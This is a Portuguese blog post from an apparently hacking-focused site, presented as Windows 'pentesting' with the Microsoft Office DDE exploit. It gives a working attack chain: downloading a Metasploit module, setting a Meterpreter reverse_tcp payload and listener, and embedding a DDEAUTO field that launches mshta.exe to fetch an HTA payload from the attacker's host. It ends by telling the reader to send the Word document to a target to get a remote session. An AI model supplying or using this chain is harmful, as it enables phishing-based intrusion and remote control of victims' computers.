Pentesting Windows usando o Microsoft Office DDE Exploit - Anonymous Hacker

[Latest News][6]

Adobe
Análise de Vulnerabilidade
ANDROID
ANONYMOUS
Anti Vírus
ANTI-DDOS
ANTI-SPYWARES E ADWARES
Antivírus
APK PRO
APOSTILAS
apps
Ativador
CIÊNCIA
Compartilhadores
Computador pc
CURSO PHP
CURSO TCP / IP
CURSOS
Cursos Diversos
CYBORG
CYBORG FALÇÃO
DDOS
DEEPWEB
Desenvolvimento Web
DICAS
Diversos
DOCUMENTARIO
DoS
Editor de Áudio
Editor de Imagem
Editor de Texto
Editor de Vídeo
Engenharia
EXPLOIT
FACEBOOK
Ferramentas de rede
FORENSE DIGITAL
Fundamentos financeiros
Gravadores
Internet
INVASÕES
IPHONE
JOGOS
KALI LINUX
Limpeza e Utilitários
Lixão
MAC OS
macOS
Malware
Manutenção de Pcs
MySQL
NOTÍCIAS
PAGINA FAKE
PHP SCRIPT
Produtividade
Programa De Invasao
PROGRAMAÇÃO
PROGRAMAS
PROXY
SCRIPTS
SEGURANÇA
Seo
SHELL
SISTEMA OPERACIONAL
TÉCNICA DE INVASÃO
Termux
tools
Utilitários
VIDEOS
VPN
WHATSAPP
WINDOWS
Wireless Attacks
z=

Pentesting Windows usando o Microsoft Office DDE Exploit



Pentesting Windows usando o Microsoft Office DDE Exploit

O DDE exploit também era conhecido como troca dinâmica de dados, permite que os dados sejam transferidos entre aplicativos sem qualquer interação do usuário. Os hackers utilizaram esse método para executar scripts mal-intencionados para comprometê-lo.
Foi relatado à Microsoft pelo Sensepost, Etienne Stalmans e Saif El-Sherei, mas não foi corrigido porque muitos aplicativos estão usando o protocolo DDE. Esta exploração não requer uma função de macro para ser ativada.

Pré-requisitos - DDE exploit

  • 📌Máquina Windows
  • 📌Microsoft Office (qualquer versão)
  • 📌KALI LINUX
Teremos que importar uma exploração do Metasploit.
Faça o download do GitHub usando o terminal de comando

wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb

Mova o script para o local do Metasploit

mv dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/
 

Agora digite msfconsole no terminal, que inicia o framework Metasploit e digite reload_all para carregar os módulos.


Esse exploit usa a função dde para entregar a carga hta. Agora digite

use exploit/windows/dde_delivery 
then set the sever host using the following command

set SRVHOST 192.168.177.141
precisamos definir um ouvinte de carga. Não use a porta 8080, pois a porta do servidor está definida por padrão para 8080

  1. set PAYLOAD windows/meterpreter/reverse_tcp
  2. set LHOST 192.168.177.141
  3. set LPORT 6708
  4. exploit


Agora copie e cole o código em qualquer documento do word. usamos o office 365 pro plus, totalmente atualizado. Localize a fórmula e você deve ter uma pequena caixa de erro no documento e, em seguida, clique com o botão direito do mouse no código de alternância. cole o comando no documento entre parênteses de flor. salve o documento.

{DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\mshta.exe “http://192.168.177.141:8080/mVg3YDU3gVQ”}
 
Envie o documento para o suspeito e uma sessão de medidor será aberta. Dê uma olhada no vídeo




Pentesting Windows usando o Microsoft Office DDE Exploit


Sobre Luiz Paulo

quando uma impressora desconhecida pegou uma galera do tipo e a mexeu para fazer um livro de espécimes do tipo. Ele sobreviveu não apenas cinco séculos.

Nenhum comentário:

Postar um comentário

Start typing and press Enter to search